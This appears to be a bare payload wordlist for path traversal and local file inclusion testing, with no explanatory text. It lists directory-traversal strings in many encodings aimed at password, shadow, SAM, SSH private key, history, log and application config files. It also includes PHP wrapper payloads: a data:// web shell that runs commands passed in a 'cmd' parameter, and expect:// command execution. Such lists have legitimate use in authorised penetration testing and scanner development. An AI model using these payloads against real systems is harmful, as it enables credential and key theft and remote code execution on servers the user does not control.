../../../etc/passwd
../../etc/passwd
../etc/passwd
etc/passwd
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/mysql/my.cnf
/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/proc/self/environ
/proc/version
/proc/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
..\..\..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\windows\win.ini
..\windows\win.ini
windows\win.ini
\windows\win.ini
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\sam
C:\windows\system32\config\system
C:\windows\system32\config\software
C:\boot.ini
C:\windows\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\php\php.ini
..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
....//....//....//etc/passwd
..././..././..././etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c0%2f..%c0%2f..%c0%2fetc%c0%2fpasswd
..%%32%66..%%32%66..%%32%66etc%%32%66passwd
..%25%32%66..%25%32%66..%25%32%66etc%25%32%66passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%255c..%255c..%255cwindows%255cwin.ini
....\/....\/....\/etc/passwd
..../..../..../etc/passwd
...../...../...../...../...../...../...../...../...../...../...../...../...../...../...../.....etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/resource=/etc/passwd
php://filter/read=string.rot13/resource=index.php
php://input
expect://id
expect://ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
data://text/plain,<?php system($_GET['cmd']);?>
file:///etc/passwd
file:///c:/windows/win.ini
/var/www/html/index.php
/var/www/html/config.php
/var/www/html/admin/config.php
/var/www/html/wp-config.php
/var/www/html/configuration.php
/var/www/html/settings.php
/var/www/html/database.php
/var/www/html/db.php
/var/www/html/.env
/var/www/html/.htaccess
/var/www/html/composer.json
/var/www/html/package.json
../var/www/html/index.php
../../var/www/html/index.php
../../../var/www/html/index.php
/usr/local/apache2/conf/httpd.conf
/usr/local/etc/apache2/httpd.conf
/opt/lampp/etc/httpd.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
/var/log/mail
/var/log/messages
/var/log/syslog
/var/log/auth.log
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/id_rsa
../../../root/.ssh/id_rsa
../../../root/.bash_history
~/.bash_history
~/.ssh/id_rsa
~/.ssh/authorized_keys
~/.mysql_history
~/.php_history
/etc/passwd%00
/etc/passwd%00.jpg
/etc/passwd%00.png
/etc/passwd%00.txt
/etc/passwd\x00
/etc/passwd\x00.jpg
../../../etc/passwd%00
../../../etc/passwd\x00
....//....//....//etc/passwd%00
/etc/passwd/../../../etc/passwd
/etc/./passwd
/etc/passwd/.
/etc//passwd
/etc/./././passwd
etc/passwd
etc\passwd
C:
C:\
C:\windows
file://
/
\
./
.\
..
....
......
........
..........
............
..............
/./././etc/passwd
.\.\.\windows\win.ini
....//....//....//....//....//....//....//etc/passwd
..\/..\/..\/..\/..\/..\/etc/passwd
../../../../../../../../../../etc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
....%2F....%2F....%2Fetc%2Fpasswd
....%5C....%5C....%5Cwindows%5Cwin.ini
/etc/apache2/sites-available/000-default.conf
/etc/apache2/sites-enabled/000-default.conf
/usr/local/apache/conf/httpd.conf
/etc/httpd/conf.d/ssl.conf
/etc/ssl/certs/ca-certificates.crt
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\
C:\windows\system32\inetsrv\config\applicationHost.config
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\ProgramData\MySQL\MySQL Server 5.7\my.ini
/etc/postgresql/*/main/pg_hba.conf
/var/lib/postgresql/data/pg_hba.conf
/var/lib/pgsql/data/pg_hba.conf
/opt/tomcat/conf/tomcat-users.xml
/opt/tomcat/conf/server.xml
/usr/local/tomcat/conf/tomcat-users.xml
/var/lib/tomcat8/conf/tomcat-users.xml
/etc/tomcat8/tomcat-users.xml
index.php
admin.php
login.php
config.php
database.php
db.php
settings.php
configuration.php
conn.php
connection.php
include.php
functions.php
init.php
header.php
footer.php
wp-config.php
wp-settings.php
.htaccess
.htpasswd
.git/config
.git/HEAD
.svn/entries
.env
composer.json
composer.lock
package.json
package-lock.json
yarn.lock
Gemfile
Gemfile.lock
requirements.txt
web.config
app.config
appsettings.json
../index.php
../../index.php
../../../index.php
../../../../index.php
../config.php
../../config.php
../../../config.php
../../../../config.php
